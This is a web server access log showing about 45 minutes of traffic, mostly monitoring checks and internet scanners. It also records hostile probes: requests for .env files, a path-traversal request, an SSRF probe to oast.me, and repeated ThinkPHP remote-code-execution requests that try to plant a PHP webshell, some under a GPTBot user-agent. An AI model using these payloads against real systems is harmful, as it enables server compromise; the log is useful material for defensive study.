165.22.143.114 - - [03/Jul/2025:21:23:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
165.22.143.114 - - [03/Jul/2025:21:23:59 +0200] "GET /auth.html HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
165.22.143.114 - - [03/Jul/2025:21:24:00 +0200] "GET /auth1.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
165.22.143.114 - - [03/Jul/2025:21:24:00 +0200] "GET /sslvpnLogin.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
165.22.143.114 - - [03/Jul/2025:21:24:00 +0200] "GET /api/sonicos/auth HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
165.22.143.114 - - [03/Jul/2025:21:24:01 +0200] "GET /api/sonicos/tfa HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.33.172 - - [03/Jul/2025:21:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61"
45.79.0.24 - - [03/Jul/2025:21:24:39 +0200] "POST /wsman HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:21:25:29 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.199 - - [03/Jul/2025:21:26:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.199 - - [03/Jul/2025:21:26:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:21:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:21:27:46 +0200] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
77.90.153.48 - - [03/Jul/2025:21:27:49 +0200] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
212.91.247.32 - - [03/Jul/2025:21:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:21:27:52 +0200] "GET /wp-json/post-smtp/v1/get-log HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
43.135.186.135 - - [03/Jul/2025:21:28:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:21:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.31.49 - - [03/Jul/2025:21:29:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
77.90.153.48 - - [03/Jul/2025:21:29:46 +0200] "POST /v6.58/Products/Authentication HTTP/1.1" 404 334 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
77.90.153.48 - - [03/Jul/2025:21:29:46 +0200] "POST /api/file/formimage HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:21:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
97.107.131.45 - - [03/Jul/2025:21:30:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.168.34.50 - - [03/Jul/2025:21:31:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.50 - - [03/Jul/2025:21:31:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.50 - - [03/Jul/2025:21:31:18 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.50 - - [03/Jul/2025:21:31:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.50 - - [03/Jul/2025:21:31:36 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.50 - - [03/Jul/2025:21:31:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
206.168.34.50 - - [03/Jul/2025:21:31:45 +0200] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [03/Jul/2025:21:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.209.214.19 - - [03/Jul/2025:21:32:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:21:33:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:21:33:09 +0200] "GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
77.90.153.48 - - [03/Jul/2025:21:33:30 +0200] "POST /Tool/uploadfile.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
95.214.53.84 - - [03/Jul/2025:21:33:31 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:21:33:33 +0200] "GET /home/ucnon.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.170.126 - - [03/Jul/2025:21:34:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:21:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.186 - - [03/Jul/2025:21:38:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [03/Jul/2025:21:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [03/Jul/2025:21:39:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:21:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:21:41:19 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.234 - - [03/Jul/2025:21:43:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
170.106.180.139 - - [03/Jul/2025:21:43:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
95.214.53.84 - - [03/Jul/2025:21:43:48 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.1.27 - - [03/Jul/2025:21:47:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
198.7.127.253 - - [03/Jul/2025:21:47:17 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
198.7.127.253 - - [03/Jul/2025:21:47:17 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:21:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.227.36.89 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.14 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.82 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.88 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.56 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.17 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.31 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.66 - - [03/Jul/2025:21:48:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.18 - - [03/Jul/2025:21:48:46 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.20 - - [03/Jul/2025:21:48:47 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.91.247.32 - - [03/Jul/2025:21:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.171.207.246 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.230 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.101 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.184 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.111 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.1 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.115 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.211 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.173 - - [03/Jul/2025:21:48:54 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [03/Jul/2025:21:49:24 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.101 - - [03/Jul/2025:21:49:24 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.111 - - [03/Jul/2025:21:49:24 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.184 - - [03/Jul/2025:21:49:24 +0200] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.91.247.32 - - [03/Jul/2025:21:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:21:50:18 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.253 - - [03/Jul/2025:21:51:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.253 - - [03/Jul/2025:21:52:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.253 - - [03/Jul/2025:21:52:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.253 - - [03/Jul/2025:21:52:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15"
212.91.247.32 - - [03/Jul/2025:21:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:21:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:21:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [03/Jul/2025:21:54:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:21:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:21:55:39 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:21:57:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:21:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:21:58:33 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:21:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:21:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:22:02:02 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:22:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
